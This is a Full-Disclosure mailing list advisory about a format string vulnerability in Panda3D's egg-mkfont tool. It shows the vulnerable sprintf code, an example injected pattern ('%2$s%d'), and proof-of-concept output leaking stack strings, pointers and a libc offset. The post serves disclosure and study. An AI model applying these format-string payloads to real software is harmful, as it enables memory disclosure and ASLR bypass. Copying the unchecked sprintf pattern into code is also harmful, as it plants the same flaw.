| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAFmK-GwTxa251gv1tFYB8MKkwZObDiUy+ZEKo8PX6b9u3zGVig@mail.gmail.com>
Date: Thu, 1 Jan 2026 14:35:16 -0500
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Panda3d v1.10.16 Uncontrolled Format String in Panda3D
egg-mkfont Allows Stack Memory Disclosure
Panda3D’s egg-mkfont utility contains an uncontrolled format string
vulnerability that allows disclosure of stack-resident memory. The -gp
(glyph pattern) command-line option allows users to specify a formatting
pattern intended for generating glyph texture filenames. This pattern is
passed directly as the format string to sprintf() without validation or
sanitization. If the supplied pattern contains additional format specifiers
beyond the expected numeric placeholder (e.g., %d), sprintf() will read
unintended values from the stack. The resulting formatted output is written
into attacker-accessible files, including generated .egg and .png files. As
a result, stack memory contents and pointer-sized values may be disclosed
to an attacker.
Root Cause Analysis:
The vulnerability originates from the following code in eggMakeFont.cxx:
char buffer[1024];sprintf(buffer, _output_glyph_pattern.c_str(), character);
-
_output_glyph_pattern is populated directly from user input via the -gp
option.
-
The user-supplied string is used as the format string to sprintf().
-
Only a single argument (character) is provided, regardless of how many
format specifiers are present.
-
When additional format specifiers (e.g., %p, %x, %n$p) are included,
sprintf() reads unintended stack values.
Impact:
An attacker with the ability to invoke egg-mkfont can:
-
Read stack-resident memory values
-
Leak pointer-sized values, including addresses
-
Reduce the effectiveness of ASLR
-
Extract sensitive process memory via generated output files
Proof of Concept:
The following example demonstrates disclosure of stack memory via injected
format specifiers:
python3 info-leak.py
======================================================================
DUMPING ALL READABLE STRINGS FROM MEMORY
======================================================================
[*] Reading strings from stack positions 1-50...
[Param 2] <Comment> {
[Param 2] "egg-mkfont -o /tmp/s2.egg -gp '%2$s%d'
/usr/share/fonts/truetype/de
[Param 2] <Texture> "
[Param 2] <Scalar> format { alpha }
[Param 2] <Scalar> minfilter { linear_mipmap_linear }
[Param 2] <Scalar> magfilter { linear_mipmap_linear }
[Param 2] <Scalar> anisotropic-degree { 0 }
[Param 2] <Scalar> quality-level { best }
[Param 2] <Transform> {
[Param 2] <Matrix3> {
[Param 2] 0.0369977678571429 0 0
[Param 2] 0 0.16015625 0
[Param 2] 0.154352678571429 0.84375 1
[Param 2] 0.0604806673728814 0 0
[Param 2] 0 0.1328125 0
[Param 2] 0.826204978813559 0.74609375 1
[Param 2] 0.0565696022727273 0 0
[Param 2] 0 0.054375 0
[Param 2] 0.0898792613636364 0.46109375 1
[Param 2] 0.0153245192307692 0 0
[Param 2] 0 0.0935763888888889 0
[Param 2] 0.201322115384615 0.636805555555556 1
[Param 2] 0 0.12890625 0
[Param 2] 0.679723011363636 0.62109375 1
[Param 2] 0.0350378787878788 0 0
[Param 2] 0 0.0504415760869565 0
[Param 2] 0.255918560606061 0.465013586956522 1
[Param 2] 0.048828125 0 0
[Param 2] 0 0.02734375 0
[Param 2] 0.232421875 0.4453125 1
[Param 2] 0.046875 0 0
[Param 2] 0 0.13671875 0
[Param 2] 0.783203125 0.8671875 1
[Param 2] 0.0252207880434783 0 0
[Param 2] 0 0.152239583333333 0
[Param 2] 0.388756793478261 0.851614583333333 1
[Param 2] 0.0467881944444445 0 0
[Param 2] 0.466840277777778 0.734375 1
[Param 2] 0 0.10546875 0
[Param 2] 0.365277777777778 0.51171875 1
--snip--
[+] Leaked 5970 addresses!
[LEAK] Param 1: 0xffffff860000003f - Stack-resident pointer-sized value
[LEAK] Param 1: 0xffffff860000003e - Stack-resident pointer-sized value
[LEAK] Param 29: 0xfffff68200008217 - Pointer within libc mapping
[LIBC] Param 29: 0xfffff6628a340 - libc+0x8a340
--snip--
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists